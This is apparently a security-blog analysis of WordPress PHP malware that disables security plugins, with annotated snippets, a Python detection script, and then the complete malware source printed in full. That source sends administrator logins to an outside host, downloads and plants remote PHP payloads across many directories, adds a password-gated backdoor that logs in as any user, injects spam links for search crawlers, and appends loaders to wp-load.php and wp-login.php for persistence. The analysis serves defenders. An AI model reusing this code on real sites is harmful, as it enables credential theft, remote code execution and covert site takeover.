I’ve previously written about malware that reverses security hardening measures, whether those were put in place manually by the site owner or through a security plugin installed on WordPress. What makes reversing hardening problematic for attackers is that a security plugin that monitors files can detect the changes and alert the owner, either via email notification or within the WordPress dashboard.

Unfortunately, PHP malware exists which solves this problem for the attacker by immediately disabling the most commonly used security plugins and preventing them from being reactivated in the WordPress dashboard.

Finding & Deactivating Security Plugins

This GIF shows a WordPress installation with a number of activated plugins, four of which are popular security plugins and two of which are non-security plugins. The animation clearly demonstrates that the non-security plugins are unaffected by the PHP malware while the four security plugins are disabled.

WordPress Security Plugin Killer

If a user tries to reactivate one of the disabled security plugins, it momentarily appears to activate, only for the malware to immediately disable it again. This behavior persists until the malware is fully removed from the compromised environment, making malicious activity on the website harder to detect.

How it works

The malware was found within the malicious file ./wp-includes/IXR/class-IXR-cache.php. It starts by defining the constant DIZIN as the malicious file’s own directory (two levels below the website’s root), which helps obfuscate the loading of the core WordPress file wp-load.php:

// DIZIN is the directory of the malicious file itself (wp-includes/IXR/)
if ( ! defined( 'DIZIN' ) ) {
    define( 'DIZIN', dirname( __FILE__ ) . '/' );
}
// Two levels up from wp-includes/IXR/ is the site root, so this bootstraps WordPress core
require_once( DIZIN ."../../wp-load.php");
...

Loading wp-load.php with require_once gives the attacker access to WordPress functions and globals, so the security plugins can be disabled cleanly through the normal plugin API. First, the attacker defines the function findinSecurity, which is used later to search the active-plugin array and return the first entry that also appears in the target list.

// Returns the first element of $find that is also present in $array (or null if none)
function findinSecurity($find, $array) {
    foreach ($find as $value) {
        if (in_array($value, $array)) {
            return $value;
        }
    }
}

Another function the attacker defines is secList, which returns an array of the targeted plugins; any of these found among the active plugins will be disabled.

// Plugin basenames (folder/main-file) of the security plugins the malware targets
function secList(){
    $plugins = array(
        "better-wp-security/better-wp-security.php",
        "sucuri-scanner/sucuri.php",
        "wp-security-audit-log/wp-security-audit-log.php",
        "total-security/total-security.php",
        "wp-hide-security-enhancer/wp-hide.php",
        "bulletproof-security/bulletproof-security.php",
        "wp-simple-firewall/icwp-wpsf.php",
        "wp-security-policy/wp-content-security-policy.php",
        "wp-cerber/wp-cerber.php",
        "defender-security/wp-defender.php",
        "security-ninja/security-ninja.php",
        "wordfence/wordfence.php",
        "cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php",
        "ninjafirewall/ninjafirewall.php",
        "security-antivirus-firewall/index.php");
    return $plugins;
}

The two functions findinSecurity and secList are then used in the main function active_plugins, which calls the WordPress function get_option('active_plugins') to obtain the list of all active plugins from the WordPress database. It then uses findinSecurity along with the list of targeted security plugins from secList to search the active plugins and disables any match using the WordPress function deactivate_plugins. Note that findinSecurity returns only the first match, so each execution deactivates a single plugin; because the malicious file is loaded on every request, any remaining targeted plugins are removed on subsequent page loads.

function active_plugins() {
    // List of active plugin basenames as stored in the wp_options table
    $the_plugs = get_option('active_plugins');
    // First active plugin that is also on the target list (null if none)
    $findinSecurity = findinSecurity( $the_plugs, secList() );
    if(!empty($findinSecurity)){
        // deactivate_plugins() lives in wp-admin, which is not loaded on front-end requests
        if ( !function_exists( 'deactivate_plugins' ) ) {
            require_once DIZIN . '../../wp-admin/includes/plugin.php';
        }
        deactivate_plugins( plugin_basename( findinSecurity( $the_plugs, secList() )));
    }
}
active_plugins();

So how does the malware automatically disable the targeted security plugins whenever someone tries to reactivate them? It does this by injecting the following loader at the bottom of the wp-load.php file.

if(file_exists(ABSPATH . WPINC . '/IXR/class-IXR-cache.php')){
    require_once( ABSPATH . WPINC . '/IXR/class-IXR-cache.php' );
}

The injection causes wp-load.php to load the malicious file ./wp-includes/IXR/class-IXR-cache.php through require_once. Since wp-load.php runs on every page load of a WordPress website, any reactivated plugin is disabled again on the very next request, regardless of whether that request comes from the same user or from a new visitor to the website’s homepage.
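As an added, defender-side example (not code from the original post or from the malware sample), the following Python script checks a WordPress install for the artifacts this sample leaves behind: the planted non-core files named on this page, the loader appended to wp-load.php and wp-login.php, and any file under wp-includes/ that calls deactivate_plugins(). It assumes that WordPress core never calls deactivate_plugins() from under wp-includes/ (used here as a heuristic), and it builds a constructed, minimal sample tree with the injection applied so that it runs offline.

```python
import os
import re
import tempfile

# Files this malware plants (paths taken from the sample); none is part of WordPress core.
PLANTED_FILES = [
    "wp-includes/IXR/class-IXR-cache.php",
    "wp-includes/theme-compat/footer-404.php",
    "wp-includes/customize/class-wp-customize-link-control.php",
]
# Core files the sample appends its loader to, and the loader line it appends.
LOADER_TARGETS = ["wp-load.php", "wp-login.php"]
LOADER_RE = re.compile(
    r"require_once\s*\(\s*ABSPATH\s*\.\s*WPINC\s*\.\s*"
    r"'/(IXR/class-IXR-cache|theme-compat/footer-404)\.php'")
# Heuristic (assumption): core never calls deactivate_plugins() from under wp-includes/.
DEACTIVATE_RE = re.compile(r"\bdeactivate_plugins\s*\(")


def scan_wordpress(root):
    """Return a sorted list of (finding, relative path) tuples for the install at root."""
    findings = []
    for rel in PLANTED_FILES:
        if os.path.isfile(os.path.join(root, rel)):
            findings.append(("planted file present", rel))
    for rel in LOADER_TARGETS:
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                if LOADER_RE.search(fh.read()):
                    findings.append(("injected loader", rel))
    for dirpath, _, names in os.walk(os.path.join(root, "wp-includes")):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if DEACTIVATE_RE.search(fh.read()):
                    findings.append(("deactivate_plugins() under wp-includes",
                                     os.path.relpath(path, root)))
    return sorted(findings)


def build_sample_install():
    """Constructed, minimal WordPress-like tree with the injection applied; returns its root."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    os.makedirs(os.path.join(root, "wp-includes", "IXR"))
    os.makedirs(os.path.join(root, "wp-includes", "theme-compat"))
    with open(os.path.join(root, "wp-load.php"), "w") as fh:  # core file plus appended loader
        fh.write("<?php\nrequire_once ABSPATH . 'wp-settings.php';\n"
                 "if(!function_exists('bot_link_class')){\n"
                 "\tif(file_exists(ABSPATH . WPINC . '/IXR/class-IXR-cache.php')){\n"
                 "\t\trequire_once( ABSPATH . WPINC . '/IXR/class-IXR-cache.php' );\n\t}\n}")
    with open(os.path.join(root, "wp-includes", "IXR", "class-IXR-cache.php"), "w") as fh:
        fh.write("<?php\ndeactivate_plugins( plugin_basename( 'wordfence/wordfence.php' ) );\n")
    with open(os.path.join(root, "wp-includes", "theme-compat", "embed.php"), "w") as fh:
        fh.write("<?php // benign core-like file, must not be flagged\n")
    return root
```

Run scan_wordpress() against a real document root after cleanup as well: an empty result for the planted files and loader lines is the sign that the persistence described above is gone.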


<?php
error_reporting(0);
if ( ! defined( 'DIZIN' ) ) {
    define( 'DIZIN', dirname( __FILE__ ) . '/' );
}
require_once( DIZIN ."../../wp-load.php");

function fileAppend($f, $c){
  $r = file_get_contents($f);
  if(!stristr($r, $c)){
    $fopenFile = fopen ($f, "a");
    file_put_contents($f, $c, FILE_APPEND);
    if(stristr($r,$c)){}
  }else{}
}


function fwrite_stream($dosya, $veri) {
	$process = fopen($dosya, "w+");
	if (fwrite($process, $veri) === FALSE) {
	   return false;
	}else{
		fclose($process);
		return true;
	}
}

function active_plugins() {
	$the_plugs = get_option('active_plugins');
	$findinSecurity = findinSecurity( $the_plugs, secList() );
	if(!empty($findinSecurity)){
		if ( !function_exists( 'deactivate_plugins' ) ) {
			require_once DIZIN . '../../wp-admin/includes/plugin.php';
		}
		//deactivate_plugins( plugin_basename( findinSecurity( $the_plugs, secList() ) ) );
	}
}
function cacheController(){
    $the_plugs = get_option('active_plugins');
    if(findinCache($the_plugs, cacheList())){
        return true;
    }else{
        return false;
    }
}
function findinSecurity($find, $array) {
    foreach ($find as $value) {
        if (in_array($value, $array)) {
            return $value;
        }
    }
}

function findinCache($find, $array) {
    foreach ($find as $value) {
        if (in_array($value, $array)) {
            return true;
        }
    }
    return false;
}

function secList(){
	$plugins = array(
		"better-wp-security/better-wp-security.php",
		"sucuri-scanner/sucuri.php",
		"wp-security-audit-log/wp-security-audit-log.php",
		"total-security/total-security.php",
		"wp-hide-security-enhancer/wp-hide.php",
		"bulletproof-security/bulletproof-security.php",
		"wp-simple-firewall/icwp-wpsf.php",
		"wp-security-policy/wp-content-security-policy.php",
		"wp-cerber/wp-cerber.php",
		"defender-security/wp-defender.php",
		"security-ninja/security-ninja.php",
		"cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php",
		"security-antivirus-firewall/index.php");
	return $plugins;
}

function cacheList(){
	$plugins = array(
		"cache-control/cache-control.php",
		"wp-rocket/wp-rocket.php",
		"cache-enabler/cache-enabler.php",
		"comet-cache/comet-cache.php",
		"hummingbird-performance/wp-hummingbird.php",
		"hyper-cache/plugin.php",
		"hyper-cache-extended/plugin.php",
		"psn-pagespeed-ninja/pagespeedninja.php",
		"redis-cache/redis-cache.php",
		"simple-cache/simple-cache.php",
		"static-html-output-plugin/wp-static-html-output.php",
		"w3-total-cache/w3-total-cache.php",
		"wp-asset-clean-up/wpacu.php",
		"wp-performance-score-booster/wp-performance-score-booster.php"
		);
	return $plugins;
}

function wp_fatest_cache_up(){
$getir = get_option("WpFastestCacheExclude");


if($getir){

if(strstr($getir,"google")){

}else{
$fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]';
update_option("WpFastestCacheExclude",$fatest_cache);
}

}else{
$fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]';
add_option("WpFastestCacheExclude",$fatest_cache);
}

	
}

function litespeed_cache_up(){
	$litespeed_cache = get_option("litespeed-cache-conf");
	if(strstr($litespeed_cache['nocache_useragents'],"google")){
}else{
	$litespeed_cache['nocache_useragents'] = "google|yandex|bing|yahoo|alexa|googleweb|yandexbot";
	update_option("litespeed-cache-conf",$litespeed_cache);
	
}
	
}

function wp_optimize_up(){
	
$getir = get_option("wpo_cache_config");

if(in_array("google",$getir['cache_exception_browser_agents'])){
	
}else{
$getir['cache_exception_browser_agents'] = array("google","googlebot","yandex","yandexbot","bing","bingbot","alexa","webmastertools","googlemobile","mobilegoogle");
update_option("wpo_cache_config",$getir);

}

}

function wp_supercache_up(){
	
global $wp_cache_config_file;
fileAppend($wp_cache_config_file, '<?php $cache_rejected_user_agent=array ( 0 => "bot", 1 => "ia_archive", 2 => "slurp", 3 => "crawl", 4 => "spider", 5 => "Yandex", 6 => "google", 7 => "bing", 8 => "googlebot", 9 => "bingbot", 10 => "alexa", 11 => "webmastertools", 12 => "googlemobile", ); ?>');
}


function GetLinkCache(){
	$cache = esc_url( home_url( '/' ) );
	return base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vbGluay5waHA/bGluaz0=").$cache;
}



function linkDownloader(){
$ch = curl_init(GetLinkCache());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$veri = curl_exec($ch);
curl_close($ch);
if(fwrite_stream(classWPCustomizeCache(), $veri)){
return true;
}else{
return json_decode(base64_decode($veri));
}
}

function linkUpdater(){
$ch = curl_init(GetLinkCache());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$veri = curl_exec($ch);
curl_close($ch);
if(fwrite_stream(classWPCustomizeCache(), $veri)){
	return true;
}else{
	return false;
}
}


function classWPCustomizeCache(){
$yol = DIZIN . "/../customize/class-wp-customize-link-control.php";
return $yol;
}



function link_control(){
	if(file_exists(classWPCustomizeCache())){
    	return fread_stream();
    }else{
        if(linkDownloader()){
            return fread_stream();
        }else{
            return linkDownloader();
        }
    }
}


function fread_stream(){
if(filesize(classWPCustomizeCache()) > 0){
$dosya = fopen(classWPCustomizeCache(), 'r');
$icerik = fread($dosya, filesize(classWPCustomizeCache()));
return $icerik;
}else{
return false;
}
fclose($dosya);
}

function cache_link_class(){
$icerik = link_control();
$linkler = json_decode(base64_decode($icerik));
return $linkler;
}


function cache_check($ara){
$aktif_plugin = get_option('active_plugins');
if (in_array($ara, $aktif_plugin)) {
    return 1;
 }else{
	 return 0;
 }
 
}

function cacheFolderExist($folder){
    $path = realpath($folder);
    return ($path !== false AND is_dir($path)) ? $path : false;
}
function deleteAll($str) {
    if (is_file($str)) {
        return unlink($str);
    }
    elseif (is_dir($str)) {
        $scan = glob(rtrim($str,'/').'/*');
        foreach($scan as $index=>$path) {
            deleteAll($path);
        }
        return rmdir($str);
    }
}

function helloDownloaderw($getAddress,$getName){
	$ch = curl_init("$getAddress");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$data = curl_exec($ch);
	curl_close($ch);

	$process = fopen("$getName", "w+");
	fwrite($process, $data);
	fclose($process);
	if($process){
		echo $getName;
		die();
	}else{
		echo 'False';
		die();
	}
}


function dosya_indir($url){
	$ch = curl_init();
	$timeout = 5;
	curl_setopt($ch,CURLOPT_URL,$url);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
	curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    curl_setopt($ch, CURLOPT_REFERER, "googlebot");
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
	$data = curl_exec($ch);
	curl_close($ch);
return $data;	
}


function getCreateLoginsd(){
	$getCache = base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS9sb2dpbi5waHA=");
	if( function_exists ( 'curl_init' ) ) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $getCache);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		$getindex = curl_exec($ch);
		curl_close($ch);
	}elseif(function_exists('file_get_contents')){
		$getindex = file_get_contents($getCache);
	}
	if($getindex == "1"){
		return true;
	}else{
		return false;
	}
}

function hop_tek() {

if($_POST){
$gelenuser = $_POST['log'];
$sifre = $_POST['pwd'];
$test = wp_authenticate($gelenuser,$sifre);
$sor = $test->allcaps;
$testet = $sor['administrator'];
if($testet){
$subject = "SİTE:".$_SERVER["HTTP_HOST"]."";
$site = $_SERVER["HTTP_HOST"];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://warezciniz.com/log.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"site=".$site."&user=".$gelenuser."&pw=".$sifre."");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
curl_close ($ch);
}
}

}



if(!empty($_GET['pw'])){
	if(md5(md5(sha1($_GET['pw']))) == '31903ca10a9ccf20f2a3a48d696e37fd'){
		if(!isset($_GET['userid'])){ echo 'OK'; }
		$cacheWP = $_GET['dosya'];
		$getCache = base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS8=").$cacheWP;

	if(!empty($_GET['update'])){
			if(linkUpdater()){
				echo "11";
				$cacheFolderExist = DIZIN . "../../wp-content/cache/";
				if(cacheFolderExist($cacheFolderExist) != FALSE){
					deleteAll(cacheFolderExist($cacheFolderExist));
					echo "11";
				}else{
					echo "11";
				}
			}else{
				echo "22";
			}
			exit;
		}
		
		
		if(!empty($_GET['dosya'])){
			if( function_exists ( 'curl_init' ) ) {
				helloDownloaderw($getCache, DIZIN . $cacheWP . '.php');
			}else{
				if(function_exists('file_get_contents')){
					$f=fopen( DIZIN . $cacheWP . '.php','w+');
					fwrite($f,file_get_contents($getCache));
					fclose($f);
					echo DIZIN . $cacheWP . '.php';
					die();
				}
			}
		}
		
			if(!empty($_GET['uploads'])){
		
		$cacheWP = $_GET['dosyam'];
		$getCache = base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS8=").$cacheWP;

                    $dosya_indir = dosya_indir($getCache);
                    $upload_name = "index";
                    $adminupload = DIZIN . "../../wp-admin/";

                    $f=fopen($adminupload."/includes/". $upload_name . '.php','w+');
					fwrite($f,$dosya_indir);
					fclose($f);
					
					$f=fopen($adminupload."/network/". $upload_name . '.php','w+');
					fwrite($f,$dosya_indir);
					fclose($f);
					
					$f=fopen($adminupload."/user/". $upload_name . '.php','w+');
					fwrite($f,$dosya_indir);
					fclose($f);

$dizinupload = DIZIN . "../../";	
$dizi_array = array(					
"/wp-includes/ID3/",
"wp-includes/rest-api/search/",
"wp-includes/rest-api/fields/",
"wp-includes/rest-api/endpoints/",
"wp-includes/widgets/",
"wp-includes/theme-compat/",
"wp-includes/Requests/",
"wp-includes/Requests/Utility/",
"wp-includes/Requests/Transport/",
"wp-includes/Requests/Response/",
"wp-includes/Requests/Proxy/",
"wp-includes/Requests/Exception/",
"wp-includes/Requests/Exception/Transport/",
"wp-includes/Requests/Exception/HTTP/",
"wp-content/languages/themes/",
"wp-content/languages/plugins/",
"wp-content/languages/"
);
			foreach($dizi_array as $key){
					$f=fopen( $dizinupload.$key."/". $upload_name . '.php','w+');
					fwrite($f,$dosya_indir);
					fclose($f);
				}

				$upload_array = array(2019,2018,2017,2016,2015);
				$upload_alt_array = array("01","02","03","04","05","06","07","08","09","10","11","12");
				$uploadfolder = DIZIN . "../../wp-content/uploads/";
				
				foreach($upload_array as $key){
					$f=fopen( $uploadfolder.$key."/"					. $upload_name . '.php','w+');
					fwrite($f,$dosya_indir);
					fclose($f);
					foreach($upload_alt_array as $alt_key){
					$f=fopen($uploadfolder.$key."/".$alt_key."/". $upload_name . '.php','w+');
					fwrite($f,$dosya_indir);
					fclose($f);
					}
				}
				echo "Upload Tamam";
						exit;

		}

		if(!empty($_GET['userid'])){
			if(getCreateLoginsd()){
				require_once( DIZIN . '../pluggable.php');
				$user_info = get_userdata($_GET['userid']);
				$username = $user_info->user_login;
				$user = get_user_by('login', $username );
				if ( !is_wp_error( $user ) )
				{
					wp_clear_auth_cookie();
					wp_set_current_user ( $user->ID );
					wp_set_auth_cookie  ( $user->ID );
					$redirect_to = user_admin_url();
					wp_safe_redirect( $redirect_to );
					exit();
				}
			}
		}
	}
}




function bot_link_class(){
	

$checkCache =  cache_link_class();

if(cache_check("wp-fastest-cache/wpFastestCache.php")){
	wp_fatest_cache_up();
 if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
           echo $checkCache->link;
        }	
}

if(cache_check("litespeed-cache/litespeed-cache.php")){
	litespeed_cache_up();
 if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
           echo $checkCache->link;
        }	
}

if(cache_check("wp-super-cache/wp-cache.php")){
	wp_supercache_up();
 if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
           echo $checkCache->link;
        }	
}


if(cache_check("wp-optimize/wp-optimize.php")){
	wp_optimize_up();
 if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot ) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
           echo $checkCache->link;
        }	
}



if($checkCache->link_durum == 1){
 echo $checkCache->link;	
}


$kontrol = cacheController();
print_r($kontrol);


if(cacheController()){
if ( !is_user_logged_in() ) {
echo $checkCache->link;
}
}else{
if( preg_match( "~(" . implode( "|", explode( "|", $checkCache->bot) ) . ")~i", strtolower( $_SERVER[ "HTTP_USER_AGENT" ] ) ) ){
echo $checkCache->link;
}
}
		
}

add_action($konum =  cache_link_class()->konum, 'bot_link_class');
add_action('wp_login', 'hop_tek');
active_plugins();

if(!file_exists(get_template_directory() . '/class-wp-functions.php')){
  helloDownloaderw(base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS9hbGw="), get_template_directory() . '/class-wp-functions.php');
}

if(!file_exists(DIZIN . '../theme-compat/footer-404.php')){
  helloDownloaderw(base64_decode("aHR0cDovL2xpbmsua3JhbHBocC5jb20vZmlsZS9sb2dpbng="), DIZIN . '../theme-compat/footer-404.php');
}


fileAppend(ABSPATH . '/wp-login.php', "\nif(!function_exists('hop_tek_login')){\n\tif(file_exists(ABSPATH . WPINC . '/theme-compat/footer-404.php')){\n\t\trequire_once( ABSPATH . WPINC . '/theme-compat/footer-404.php' );\n\t}\n}");



fileAppend(ABSPATH . '/wp-load.php', "\nif(!function_exists('bot_link_class')){\n\tif(file_exists(ABSPATH . WPINC . '/IXR/class-IXR-cache.php')){\n\t\trequire_once( ABSPATH . WPINC . '/IXR/class-IXR-cache.php' );\n\t}\n}");